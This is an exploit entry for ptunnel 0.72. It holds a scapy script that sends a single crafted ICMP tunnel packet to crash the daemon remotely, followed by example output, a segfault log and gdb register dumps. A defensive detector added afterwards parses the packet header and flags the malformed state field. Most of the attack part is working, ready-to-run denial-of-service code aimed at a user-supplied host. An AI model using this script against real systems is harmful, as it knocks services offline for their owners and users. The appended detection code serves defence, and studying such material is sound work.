ptunnel <= 0.72 Remote Denial of Service
Source: st3n [at sign] funoverip [dot] net  Author: st3n  Published: 2012-07-23

#!/usr/bin/env python
#===============================================================================
# Exploit Title: ptunnel <= 0.72 Remote Denial of Service (ICMP tunnel crash)
# Date: January 2012
# Exploit Author: st3n [at sign] funoverip [dot] net
# Vendor Homepage: http://www.cs.uit.no/~daniels/PingTunnel/
# Software Link: http://www.cs.uit.no/~daniels/PingTunnel/PingTunnel-0.72.tar.gz
# Version: 0.72 (and probably below)
# Tested on: Debian Lenny
#===============================================================================


#===============================================================================
# PoC code (scapy)
#===============================================================================

import sys
from scapy.all import *
conf.verbose = 0

# arg ?  (argv[0] is the script itself, so one argument means len == 2)
if len(sys.argv) < 2:
    sys.exit('Usage: %s <host>' % sys.argv[0])

# target
remote_host = sys.argv[1]

# ptunnel.h
#typedef struct {
#        uint32_t        magic,          //      magic number, used to identify ptunnel packets.
#                        dst_ip,         //      destination IP and port (used by proxy to figure
#                        dst_port,       //      out where to tunnel to)
#                        state,          //      current connection state; see constants above.
#                        ack,            //      sequence number of last packet received from other end
#                        data_len;       //      length of data buffer
#        uint16_t        seq_no,         //      sequence number of this packet
#                        id_no;          //      id number, used to separate different tunnels from each other
#        char            data[0];        //      optional data buffer
#} __attribute__ ((packed)) ping_tunnel_pkt_t;

# build packet: each field is emitted raw, in network byte order, matching the packed struct above
magic = b'\xd5\x20\x08\x80'     # ptunnel magic number, so the daemon treats this as a tunnel packet
dst_ip = b'AAAA'
dst_port = b'BBBB'
state = b'CCCC'                 # <===== this triggers the vulnerability
ack = b'\x00\x00\xff\xff'
data_len = b'\x00\x00\x00\x00'  # no trailing data buffer
seq_id = b'DDDD'                # seq_no and id_no (two uint16)
pkt = IP(dst=remote_host)/ICMP()/Raw(magic)/Raw(dst_ip)/Raw(dst_port)/Raw(state)/Raw(ack)/Raw(data_len)/Raw(seq_id)

# evil evil packet
send(pkt)


#=========================================================================
# Example & Info
#=========================================================================

# Sending evil packet
# -------------------

# $ sudo ./ptunnel-dos.py 127.0.0.1
# .
# Sent 1 packets.

 

# Daemon side
# -----------

# $ ptunnel -c lo
# [inf]: Starting ptunnel v 0.72.
# [inf]: (c) 2004-2011 Daniel Stoedle, <daniels@cs.uit.no>
# [inf]: Security features by Sebastien Raveau, <sebastien.raveau@epita.fr>
# [inf]: Forwarding incoming ping packets over TCP.
# [inf]: Initializing pcap.
# [inf]: Ping proxy is listening in privileged mode.
# Segmentation fault


# Debug info
# -----------

#  Program received signal SIGSEGV, Segmentation fault.
#  handle_packet (buf=0x80774a0 "E", bytes=56, is_pcap=1, addr=0xbffff65c, icmp_sock=7) at ptunnel.c:957
#  957                             pt_log(kLog_sendrecv, "Recv: %d [%d] bytes [seq = %d] [type = %s] [ack = %d] [icmp = %d] [user = %s] [pcap = %d]\n",
#  (gdb)
#  (gdb) i r
#  eax            0x3434343        54739779
#  ecx            0x0      0
#  edx            0x3434343        54739779
#  ebx            0x8050184        134545796
#  esp            0xbffff380       0xbffff380
#  ebp            0xbffff468       0xbffff468
#  esi            0xffff   65535
#  edi            0xbffff5c8       -1073744440
#  eip            0x804cdfa        0x804cdfa <handle_packet+494>
#  eflags         0x10202  [ IF RF ]
#  cs             0x73     115
#  ss             0x7b     123
#  ds             0x7b     123
#  es             0x7b     123
#  fs             0x0      0
#  gs             0x33     51


# eof
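A defender-side check for the condition this PoC triggers, added here as an example (it is not part of the original advisory nor of ptunnel itself): it parses the ping_tunnel_pkt_t header quoted above out of an ICMP payload and flags a state field that lies outside the small range of enumerated connection states. The magic constant is taken from the bytes the PoC sends; the upper bound on valid state values and the data_len sanity check are assumptions, not something the advisory states.

```python
import struct

# ping_tunnel_pkt_t from ptunnel.h, packed, network byte order:
# six uint32 (magic, dst_ip, dst_port, state, ack, data_len), two uint16 (seq_no, id_no)
PT_HDR = struct.Struct("!6I2H")          # 28 bytes, which matches bytes=56 minus IP+ICMP headers
PT_MAGIC = 0xD5200880                    # the magic bytes the PoC sends: d5 20 08 80
# Assumption: ptunnel's connection states are small enumerators, so a state value
# this large or larger has no entry in the daemon's state table and is suspect.
MAX_KNOWN_STATE = 16
FIELDS = ("magic", "dst_ip", "dst_port", "state", "ack", "data_len", "seq_no", "id_no")

def parse_ptunnel(payload):
    """Return the header fields of an ICMP payload as a dict, or None if it is not ptunnel traffic."""
    if len(payload) < PT_HDR.size:
        return None
    hdr = dict(zip(FIELDS, PT_HDR.unpack_from(payload)))
    if hdr["magic"] != PT_MAGIC:
        return None
    hdr["payload_len"] = len(payload) - PT_HDR.size   # bytes following the fixed header
    return hdr

def classify(payload):
    """Return ('ignore'|'ok'|'alert', reason) for one ICMP payload."""
    hdr = parse_ptunnel(payload)
    if hdr is None:
        return ("ignore", "not a ptunnel packet")
    if hdr["state"] >= MAX_KNOWN_STATE:
        return ("alert", "state 0x%08x outside known state range" % hdr["state"])
    # General sanity check (assumed, not from the advisory): data_len must fit inside the packet.
    if hdr["data_len"] > hdr["payload_len"]:
        return ("alert", "data_len %d exceeds %d trailing bytes" % (hdr["data_len"], hdr["payload_len"]))
    return ("ok", "state %d, %d data bytes" % (hdr["state"], hdr["data_len"]))

# Constructed samples: the 28-byte payload the PoC sends, and a plausible benign header.
POC_PAYLOAD = (b"\xd5\x20\x08\x80" + b"AAAA" + b"BBBB" + b"CCCC"
               + b"\x00\x00\xff\xff" + b"\x00\x00\x00\x00" + b"DDDD")
BENIGN_PAYLOAD = PT_HDR.pack(PT_MAGIC, 0x7f000001, 22, 3, 0, 5, 1, 7) + b"hello"

if __name__ == "__main__":
    for name, p in (("poc", POC_PAYLOAD), ("benign", BENIGN_PAYLOAD)):
        verdict, reason = classify(p)
        print("%-6s %s: %s" % (name, verdict, reason))
```

The payload argument is the data following the ICMP header, so the same function can be fed from a pcap reader or a scapy sniff callback.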


 